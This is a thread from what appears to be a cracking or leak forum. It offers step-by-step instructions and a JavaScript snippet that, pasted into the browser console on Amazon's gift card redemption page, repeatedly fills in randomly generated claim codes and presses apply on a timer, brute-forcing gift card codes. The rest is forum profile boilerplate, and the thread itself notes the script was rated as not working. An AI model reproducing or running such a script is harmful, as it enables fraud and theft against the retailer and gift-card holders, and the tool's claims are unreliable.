• 📢 Notice: Our community has moved to Zelo.cx! Visit us at Zelo.cx for the latest updates and discussions.

[SOURCE CODE] AMAZON GIFTCARD GENERATOR + CHECKER [UPDATED]

DankoFR

Divine
Divine
DankoFR Rep
0
0
0
Rep
325
DankoFR Vouches
0
0
0
Vouches
0
Posts
1,690
Likes
2,992
2 YEARS
2 YEARS OF SERVICE
Don't have an account? No worries! Click me to register so you could reply to this thread! (And view its content)
Register Today
[Image: K8N5F.png]

Like the Thread for More Leaks!


[HIDE]
Steps:[/HIDE]
  • 1. Login into your account
  • 2. Add any item to the cart (Value doesn't matter)
  • 3.Proceed to the payout page (Do not order it though
  • 4. Press on add/use gift card button
  • 5. Open the console of the navigator and paste the code below
  • 6. Select 2,000 if your PC could handle a lot of threading, if not, select 3,000 (Better do it on an RDP so you could leave it running overnight
Code:
var speed = prompt("Type 2,000 if your PC is fast, 3000 for a slow pc");

function Letter() {
var code = "";
var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}

function Number() {
var code = "";
var chars = "0123456789";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}

function Random() {
var code = "";
var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}

function main() {

document.getElementsByName("ppw-claimCode")[0].value =
Letter() +Letter() +Letter() +Letter() +"-" +
Letter() +Letter() +Letter() +Letter() +Letter() +Letter() +"-" +
Letter() +Letter() +Letter() +Random();
//EDIT THIS TOP LINE FOR A CUSTOM PATTERN BY REPLACING Random() FOR Letter() OR Number()

document.getElementsByName("ppw-claimCodeApplyPressed")[0].click();
}
setInterval(function () {
main();
}, speed);

This leak has been rated as not working 1 times this month. (2 times in total)
 

PureBitcoin

Divine
Divine
PureBitcoin Rep
0
0
0
Rep
302
PureBitcoin Vouches
0
0
0
Vouches
0
Posts
1,671
Likes
2,621
Bits
3 YEARS
3 YEARS OF SERVICE

isdadan

Elite member
Elite member
Rep
0
0
0
Rep
0
Vouches
0
0
0
Vouches
0
Posts
217
Likes
3
Bits
2 YEARS
2 YEARS OF SERVICE

MatDev

Active member
Rep
0
0
0
Rep
0
Vouches
0
0
0
Vouches
0
Posts
82
Likes
0
Bits
3 YEARS
3 YEARS OF SERVICE
[font][font]hello[/font][/font]
 

48,736

38,247

238,888

Top